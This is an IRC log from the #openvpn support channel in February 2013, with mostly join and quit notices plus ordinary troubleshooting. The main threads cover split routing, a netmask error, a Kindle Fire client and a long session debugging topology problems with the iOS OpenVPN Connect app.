19:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds]
19:20 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 255 seconds]
19:22 -!- raidz is now known as raidz_away
19:24 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds]
19:25 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 256 seconds]
19:27 -!- corretico [~luis@190.211.93.38] has joined #openvpn
19:28 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out]
20:01 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
20:04 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
20:38 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit []
20:42 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
20:44 -!- gardar_ [~gardar@gardar.net] has quit [Read error: Operation timed out]
20:46 -!- gardar [~gardar@gardar.net] has joined #openvpn
20:48 -!- nameless` [~nameless@u1c.eu] has quit [Ping timeout: 252 seconds]
20:48 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has quit [Remote host closed the connection]
20:48 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn
20:49 -!- nameless` [~nameless@u1c.eu] has joined #openvpn
20:50 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit []
20:52 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer]
20:57 -!- wertik_any [~wertik_an@unaffiliated/wertik-any/x-4132569] has joined #openvpn
20:57 < wertik_any> !welcome
20:57 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server.
|| Also interesting: !man !/30 !topology !iporder !sample !forum
20:57 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
21:10 -!- wertik_any [~wertik_an@unaffiliated/wertik-any/x-4132569] has quit [Ping timeout: 276 seconds]
21:23 -!- rkantos [robin@4e.fi] has quit [Remote host closed the connection]
21:48 -!- NChief_ [tomme@unaffiliated/nchief] has joined #openvpn
21:48 -!- thermoman_ [~thermoman@idle.foobar0815.de] has joined #openvpn
21:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
21:52 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
21:53 -!- Netsplit *.net <-> *.split quits: Saviq, scoates, b00b, NChief, thermoman
21:53 -!- _b00b is now known as b00b
21:58 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds]
21:58 -!- Devastator [~devas@177.99.152.211] has joined #openvpn
21:58 -!- Devastator [~devas@177.99.152.211] has quit [Changing host]
21:58 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
22:23 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn
22:31 -!- brute11k [~brute11k@89.249.231.69] has joined #openvpn
22:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
22:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:05 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Ping timeout: 256 seconds]
23:46 -!- brute11k [~brute11k@89.249.231.69] has quit [Quit: Leaving.]
23:47 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has quit [Read error: Connection reset by peer]
--- Day changed Tue Feb 05 2013
00:03 -!- brute11k [~brute11k@89.249.231.69] has joined #openvpn
00:33 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
00:51 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
00:53 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 252 seconds]
00:55 -!- ura [~ura@unaffiliated/ura] has quit [Ping timeout: 245 seconds]
00:56 -!- ura [~ura@unaffiliated/ura] has joined #openvpn
01:06 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn
01:07 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has quit [Ping timeout: 245 seconds]
01:08 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn
01:08 < oomph> has anyone here gotten OpenVPN to run on a kindle fire?
01:09 < oomph> I know there is an APK available in the Android market, however the Kindle's market is lacking.
01:12 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 248 seconds]
01:24 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has quit [Quit: oomph]
01:25 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn
01:27 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has left #openvpn []
01:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Excess Flood]
01:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:04 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Ping timeout: 264 seconds]
02:05 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn
02:05 < LEDfan> !welcome
02:05 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners.
|| See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
02:05 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
02:06 < LEDfan> !goal
02:06 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
02:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:24 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
02:26 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
02:26 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host]
02:26 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn
02:26 -!- p3rror [~mezgani@2001:0:53aa:64c:386c:2f26:d607:4f60] has joined #openvpn
02:32 -!- RealRancor [~chris@p5B13D5E3.dip0.t-ipconnect.de] has joined #openvpn
02:45 -!- p3rror [~mezgani@2001:0:53aa:64c:386c:2f26:d607:4f60] has quit [Ping timeout: 245 seconds]
02:49 -!- RealRancor [~chris@p5B13D5E3.dip0.t-ipconnect.de] has quit [Quit: Leaving.]
02:57 -!- SpookZa [~SpookZA@197.87.128.172] has joined #openvpn
03:12 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
03:26 -!- brute11k1 [~brute11k@89.249.231.69] has joined #openvpn
03:27 -!- brute11k [~brute11k@89.249.231.69] has quit [Ping timeout: 264 seconds]
03:29 -!- funky1 [~funky1@ip51cf100e.direct-adsl.nl] has joined #openvpn
03:30 < funky1> hi all :) got an openvpn server on my ubuntu machine on the internet, I connect to it with my windows based OS client, all works well, but for some web addresses I'd like my windows client to not use the vpn connection but my real IP when I open those sites, is that somehow possible?
03:33 <+pekster> Using a proxy is a better choice for that instead of redirecting your traffic
03:34 <+pekster> You can't know in advance what IP a DNS name will resolve to, which is required to do route-based exceptions. Additionally, Windows clients are not able to do policy routing
03:35 <+pekster> Why not use a proxy in your browser, set the proxy point to your VPN server, and then define domain-based rules in your proxy?
I do the same thing with one of my VPN tunnels by using openvpn/tiny-proxy/Firefox+FoxyProxy
03:37 < funky1> thanks pekster, will think about the proxy suggestion :)
03:41 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
03:41 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 244 seconds]
03:42 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
03:52 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn
03:52 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
03:53 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
03:55 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 246 seconds]
04:07 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
04:23 -!- zz_AsadH is now known as AsadH
04:24 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection]
04:26 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
04:26 -!- mode/#openvpn [+o plaisthos] by ChanServ
04:27 <@plaisthos> If the guy asking for the apk for kindle fire comes back direct him here: http://plai.de/android/ and tell him that he should report back if it worked
04:27 <@vpnHelper> Title: Index of /android (at plai.de)
04:29 <+pekster> Sounds good
04:29 <+pekster> !kindle
04:29 <+pekster> Sounds like we need a new bot entry
04:30 <+pekster> krzee: ping on adding a new bot entry: !kindle as http://plai.de/android/ (and ask folks to report back if it worked.)
04:30 <@vpnHelper> Title: Index of /android (at plai.de)
04:51 -!- julius_ [~julius@141.41.92.122] has joined #openvpn
04:59 -!- dazo_afk is now known as dazo
05:36 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
05:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
05:57 -!- niervol [~krystian@193.106.244.150] has quit [Read error: Connection reset by peer]
05:58 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
06:14 -!- Porkepix [~Porkepix@157.138.188.184] has joined #openvpn
06:15 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
06:16 -!- funky1 [~funky1@ip51cf100e.direct-adsl.nl] has left #openvpn []
06:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
06:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
06:39 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Remote host closed the connection]
06:49 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
07:01 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 256 seconds]
07:02 -!- master_of_master [~master_of@p57B55202.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
07:04 -!- master_of_master [~master_of@p57B553B8.dip.t-dialin.net] has joined #openvpn
07:15 -!- blackmagic [~black@got.laid.using.blackmajic.org] has quit [Read error: Connection refused]
07:27 <@ecrist> !learn kindle as http://plai.de/android/ - Please report back if you have issues, or if it worked well.
07:27 <@vpnHelper> Joo got it.
07:27 <@ecrist> !kindle
07:27 <@vpnHelper> "kindle" is http://plai.de/android/ - Please report back if you have issues, or if it worked well.
07:27 <@ecrist> pekster: ^^^
07:28 * plaisthos has no idea if that works or not :)
07:28 <@plaisthos> The new kindles are based on 4.0 ... so it may work
07:29 <@ecrist> !forget kindle
07:29 <@vpnHelper> Joo got it.
07:29 <@ecrist> !learn kindle as http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) 07:29 <@vpnHelper> Joo got it. 07:29 <@ecrist> :) 07:29 <@plaisthos> :D 07:31 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn 07:31 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has left #openvpn [] 07:51 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 07:52 < y4h0> ls 07:52 < y4h0> hey 07:54 < y4h0> when i am starting openvpn i get a message Options error: --server directive network/netmask combination is invalid when starting why ? 07:54 < y4h0> here is my server.conf http://pastie.org/6058347 07:55 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds] 07:56 < EugeneKay> Because your network/netmask combination is invalid. 07:56 < defsdoor> y4h0, server 192.168.9.0 255.255.255.0 07:56 -!- ade_b [~Ade@109.58.175.187.bredband.tre.se] has joined #openvpn 07:56 -!- ade_b [~Ade@109.58.175.187.bredband.tre.se] has quit [Changing host] 07:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:05 < havoc> http://www.isg.rhul.ac.uk/tls/ 08:05 <@vpnHelper> Title: Lucky Thirteen: Breaking the TLS and DTLS Record Protocols (at www.isg.rhul.ac.uk) 08:05 < havoc> that's probably been seen here already, but there it is 08:06 -!- b1rkh0ff [~b1rkh0ff@178.77.13.80] has quit [Ping timeout: 264 seconds] 08:09 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn 08:10 < havoc> no need to panic just yet though 08:10 < havoc> lotta deps to pull it off successfully 08:11 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Client Quit] 08:17 < sam1> is it recommended to use ebtables to firewall network bridges? 
08:18 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has joined #openvpn 08:22 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 08:23 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 08:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 08:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:28 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 08:28 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 08:28 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 08:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 08:46 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 08:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:08 <@dazo> sam1: yes 09:14 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has joined #openvpn 09:16 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has quit [Client Quit] 09:22 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has joined #openvpn 09:22 -!- Porkepix [~Porkepix@157.138.188.184] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 09:25 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has quit [Client Quit] 09:29 < sam1> dazo: any link regarding ebtables and what to isolate when it comes to vpn? 
09:29 <@dazo> !notovpn 09:29 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 09:30 <@dazo> sam1: try #netfilter 09:32 -!- nickanderson_afk is now known as nickanderson 09:34 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Operation timed out] 09:42 * ecrist pokes mattock 09:50 -!- linuxthefish [linuxfish@br.freeBNC.net] has joined #openvpn 09:51 -!- linuxthefish [linuxfish@br.freeBNC.net] has left #openvpn [] 09:57 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 09:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:03 -!- nickanderson is now known as nickanderson_afk 10:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:15 -!- raidz_away is now known as raidz 10:17 -!- AsadH is now known as zz_AsadH 10:22 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn 10:29 -!- _AxS_ [~axs@gentoo/developer/axs] has joined #openvpn 10:31 < _AxS_> Hey all .. i've got a somewhat odd issue that I don't know how to debug. I've got an openvpn setup that's working well between my server and a couple of laptops. I just installed the openvpn-connect app on my iPhone, and set it up, and it works fine locally but when connecting remotely no traffic goes across the vpn. I can actually ping the vpn address of the phone from the server fine, but i can't contact the server from the phone. 10:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:33 < _AxS_> aw damn; i bet it is a routing issue. It seems my lan router has a default route to handle pointing traffic to the vpn gateway, so this explains why it's working fine locally (traffic isn't actually going out on the vpn, just in) 10:33 < kisom> _AxS_: Do you push the correct routes and all that? 
I use the iOS app and it works just fine 10:34 < _AxS_> kisom: the .ovpn file is identical to what I use on the laptops, so I would expect so. The log also -seems- to say yes. But I'm thinking it isn't. 10:37 < kisom> _AxS_: Is your device jailbroken? I know people have been having issues with jailbroken devices and oVPN. 10:38 < _AxS_> kisom: not jailbroken. I was actually starting to wonder if i needed to jailbreak. Good to know i don't. 10:39 < kisom> _AxS_: OK. To me it sounds more like a firewall issue since pinging works from the server to the phone 10:40 < _AxS_> ...i currently do not have anything on the server that pushes a route. 10:40 < _AxS_> kisom: if it's a firewall issue then it'd be the firewall -within- the phone, tho. 10:40 < kisom> There's no firewall in iOS afaik 10:40 < _AxS_> (since 10.8.x.x should never touch the regular lan, right?) 10:41 < kisom> Besides, it answers to ping, then routing works 10:41 < _AxS_> i can paste both my client and server configs, if it helps -- iirc they are both rather simple/standard tho 10:41 < kisom> Sure 10:42 < kisom> Also paste the output from iptables -nvL and iptables -t nat -nvL 10:45 < _AxS_> kisom: server config: http://bpaste.net/show/75268/ , client config: http://bpaste.net/show/75270/ 10:46 < _AxS_> kisom: the openvpn server isn't the router for the local network, so my NAT'ing etc isn't done there. I'm also not (at this time) allowing access from the vpn to more than the server itself. 10:53 < kisom> _AxS_: Looks good to me. 10:53 < _AxS_> kisom: ...and it's working fine for 3 laptops, as i mentioned.. just the iphone doesn't like it.. 10:54 < kisom> Well as I said, since the phone can reply to your servers ping requests then routing is fine 10:54 < kisom> I'm not exactly sure what you're trying to access on the server from the phone. 
10:54 < _AxS_> i've got intranet services on a web server on 10.8.0.1 10:54 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:55 < _AxS_> ...and eventually i'd like to handle direct access to mail services that way too 10:55 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 10:55 -!- mode/#openvpn [+v hazardous] by ChanServ 10:55 < kisom> And you're able to access the web server via your laptops running openvpn? 10:56 < _AxS_> kisom: yep. Can also easily ssh-in that way too. on the laptops everything is ust working as expected. (laptops are a mix of linux and windows, btw) 10:56 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has joined #openvpn 10:56 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has quit [Changing host] 10:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:58 < kisom> _AxS_: Have you tried switching to net30 instead of subnet? 10:58 < _AxS_> ..nope. need to look up that one 10:59 -!- zz_AsadH is now known as AsadH 11:00 < _AxS_> ah, right. Yeah my first openvpn setup was with 2.1 or 2.2, so 'topology subnet' was always available. I never tried the older 'net30' method 11:00 < kisom> I don't think that's the issue either, but I know there are some limitations with the iOS tun implementation 11:01 < kisom> So give it a try. I use net30. 11:02 < _AxS_> ..right. So i dropped the (useless, since i'm not NAT'ing 10.8.x.x) route from my lan router, and now pings from the server to the iphone go unanswered. this seems more inline with what is expected.. 11:15 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:36 < _AxS_> kisom: ok, net30 works. 11:37 < _AxS_> kisom: ..except I can't use net30 because two of the laptops that need access are out of the country for the next couple of months. 
However, at least now I have a lead for my research 12:04 -!- AsadH is now known as zz_AsadH 12:10 -!- thermoman_ is now known as thermoman 12:21 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 12:22 -!- brute11k1 [~brute11k@89.249.231.69] has quit [Ping timeout: 260 seconds] 12:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 12:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:41 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 12:41 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 255 seconds] 12:52 <+pekster> _AxS_: fwiw, you can push topology from the server. I leave it out on all my configs I design so it can be changed centrally 12:59 < _AxS_> pekster: yes I noticed that -- I'll be converting the clients to do that I think once I get access to them. 12:59 -!- zz_AsadH is now known as AsadH 12:59 < _AxS_> i'm still confused as to why topology subnet isn't working, though -- it's reported to work and is the -only- way for ipv6 to work... 13:00 < _AxS_> ..and of course, there are no errors in any logs to help me debug this 13:01 <+pekster> Yea, no idea there, unless the tun driver doesn't support ip/subnet configuration through the OS-level network commands called 13:02 <+pekster> (or does allow openvpn to call it and then fails to properly set it up...) 13:02 < _AxS_> ..which would seem odd to me, esp given that it works with net30 and i assume it's the same calls... 13:02 <+pekster> No, not at all 13:02 < _AxS_> oh? 
13:03 <+pekster> net30 is a PtP setup using a peering between the 2 center IPs in a /30 for compatibility with Windows systems that required a subnet-based fake Ethernet network to connect 13:03 <+pekster> It's basically just there to support Windows clients before the 2.1 release came out that supported subnet topology 13:04 <+pekster> net30 does do a "subnet-like" allocation of the /30 in Windows, but Unix/Linux actually sets up a PtP connection, not a /30 "subnet" (despite the directive's name) 13:05 < _AxS_> Ahhh... yeah that could be a difference. i wonder if for some reason it's doing that even with 'topology subnet' .. 13:05 <+pekster> Nope 13:06 <+pekster> See the manpage; your tun driver (and ifconfig or ip tool used to set it) requires support for that, however 13:06 < _AxS_> Although, given that there's a bunch of positive reports on using stuff like 'redirect-gateway' to route all traffic through to the vpn, i expect things are working properly (and using 'topology subnet') 13:06 <+pekster> It should spew errors if it lacks the support, but if the support is there but incorrectly implemented it would silently fail 13:07 <+pekster> Even though it's a tun (ie: OSI Layer 3, or IP) connection, 'subnet' topology sets an IP+mask, not the traditional PtP setup for tun 13:07 < _AxS_> ... does 'redirect-gateway' work in net30 ? 13:08 <+pekster> Yup, it works in any topology as it adjusts the routing table; openvpn is just the program calling the system commands to do that 13:11 -!- nickanderson_afk is now known as nickanderson 13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 13:21 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 264 seconds] 13:21 <@krzee> anyone here know someone really good at seo? 13:22 < _AxS_> hm. does the server automatically push "topology subnet" if it's set in the config file? 
I dropped topology from the client .ovpn, added a push "topology subnet" in the server's config , now the client is erroring on duplicate topology entries.. 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:25 <+pekster> No need for the push since you're using --server (see how that directive expands) 13:25 < _AxS_> gotchya. 13:25 <+pekster> Just declare the topology and --server takes care of it. You only ever need to define the push if you self-expand that directive 13:26 <+pekster> (which I like since it tells you exactly what's happening, but some people like the "cleaner" looking config files with the meta-directives) 13:27 < _AxS_> ... i wonder if my client-to-client directive is getting in the way... 13:28 < _AxS_> ..nope 13:28 < _AxS_> oh well, i'll play with this later. tnx for being a sounding board 13:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:45 -!- mnbr [~fr34k@unaffiliated/mnbr] has joined #openvpn 13:46 < mnbr> free vpn 13:47 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:48 -!- mnbr [~fr34k@unaffiliated/mnbr] has quit [Quit: Leaving] 13:56 -!- rkantos [robin@4e.fi] has joined #openvpn 14:02 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 14:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 14:16 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 14:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 14:17 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:17 -!- mode/#openvpn [+v s7r] by ChanServ 14:36 -!- Devastator- [~devas@177.18.196.246] has joined #openvpn 14:37 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 246 seconds] 14:38 < _AxS_> OK so this is odd. 
iOS client -- topology subnet, i added redirect-gateway just for fun, and everything works. without redirect-gateway it doesn't work. 14:38 < _AxS_> (everything being relative -- i don't have my server set up to NAT the vpn, so i can only access stuffs on the vpn) 14:39 <+pekster> topology subnet has an implicit link-local route for the subnet 14:40 <+pekster> eg: 'ifconfig-push 10.8.0.2 255.255.255.0' adds the 10.8.0.2/24 via 10.8.0.1 (or whatever your server VPN IP is) 14:40 < _AxS_> pekster: ..and the log seems to say that this is being set, but I'm thinking maybe it isn't... 14:41 <+pekster> What can't you do if you don't redirect-gateway? Access the VPN IP of the server? 14:41 <+pekster> You can never access server-side subnets unless you push routes for them 14:41 <+pekster> !serverlan 14:41 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 14:41 < _AxS_> pekster: access anything on the vpn 14:42 <+pekster> What's the routing table on the client after connect in subnet topology? 14:42 < _AxS_> pekster: no idea, haven't found a way to query the routing table of an iphone 14:42 < _AxS_> (not jailbroken, so no access to all the usual linux goodies) 14:43 <+pekster> Lovely. 14:43 <+pekster> (More poking at Apple's walled garden, not the fact that you aren't jailbroken) 14:43 * _AxS_ nods 14:43 <+pekster> Maybe --show-net-up ? 
14:43 <+pekster> Oh, I guess that's listed under "Windows-Specific options" :( 14:43 -!- suprsonic [~suprsonic@services.landonsanderson.com] has joined #openvpn 14:44 < _AxS_> i tried using it with verb 6 but it didn't output anything differently from verb 3 (i think verbosity might be ignored or hard set in the ios client right now) 14:44 <+pekster> If you can't ping 10.8.0.1 (VPN server IP) with topology subnet without redirect-gateway, but you can without it, file a bug against openvpn-connect I'd guess. That's not open-source, and neither is your OS, so I doubt people here can help further without access to information we can't ever get 14:45 <+pekster> s/without it/with it/ 14:45 <+pekster> And consider a more open platform ;) 14:45 < _AxS_> pekster: i can't ping 10.8.0.1 from the ping client on the phone, no. However, i *can* ping the client's IP from the server, at least 3/4 of the time. 14:45 < _AxS_> pekster: ..which is odd. 14:46 < _AxS_> Anyhow, this is progress -- at least I've got a way to access the VPN if i need to. I just can't access anything other network resources when connected, which I'm ok with for now 14:48 * pekster likes open platforms since you can poke at them in as much depth as your knowledge/resources allow. I don't necessarily understand all the code, but it's nice to 'grep -nR "error message" *' and see what's actually going on 14:48 <+pekster> It's solved plenty of issues even if nothing was really "broken" just knowing how it worked 14:51 < _AxS_> pekster: given the config i'm using is almost identical to configs on laptop clients, I expect this is a bit of a bug with the (rather new) iOS client. Another tidbit that I mentioned earlier which you might have missed -- when connected to my local network, and my router has a route rule for 10.8.0.0/24 -> [lan-ip-of-server-running-openvpn], everything works. So it's almost as if 10.x.x.x traffic doesn't get bound to the tun iface correctly. 14:53 * pekster shrugs. 
If you can't even ping across the VPN between the peers (and have checked the firewalls) then it's a much more basic problem that needs solving 14:53 <+pekster> Hard to solve basic problems when you're dealing with opaque black-box programs without access to the source, debugging info, or system routing/interface info 14:54 < _AxS_> yep, very true. 14:55 < neilhwatson> sssh, don't rile the Job's Army. 14:57 <+pekster> Yes, yes, don't look at the walls of our garden as the vines that cover them are so pretty! 14:57 < _AxS_> Anyone know off-hand what the route 'redirect-gateway' adds is? is it the standard 'default via 10.8.0.1' type thing? 14:58 <+pekster> _AxS_: manpage tells you. Either 0/0, or two /1 routes depending on how you call it 14:58 < _AxS_> ah, there's the default. ok tnx 15:00 * _AxS_ is going to try and toss a slightly wider net with a static network route and see if that'll do the trick 15:01 -!- suprsonic [~suprsonic@services.landonsanderson.com] has left #openvpn [] 15:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:04 < _AxS_> AHA, progress. "tun_build_route_error: only tunnel routes supported" .. http://sourceforge.net/mailarchive/message.php?msg_id=30371407 seems to match 15:04 <@vpnHelper> Title: SourceForge.net: OpenVPN: (at sourceforge.net) 15:05 <+pekster> Well then, apparently the claim that it's "100% protocol-compatible" is untrue 15:05 <+pekster> Who would have thought a disjoined codebase could ever fail there... :P 15:07 <+pekster> Not really a problem #openvpn can help with. Dunno if #openvpn-as supports their proprietary mobile app or not; you can try there, or their other support mechanisms 15:07 <+pekster> I'd say to check the code, but... ;) 15:08 < _AxS_> pekster: :) 15:09 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 15:10 < p47gat> I can pass the internet with ipv4 forwarding and before it works HELP ! 
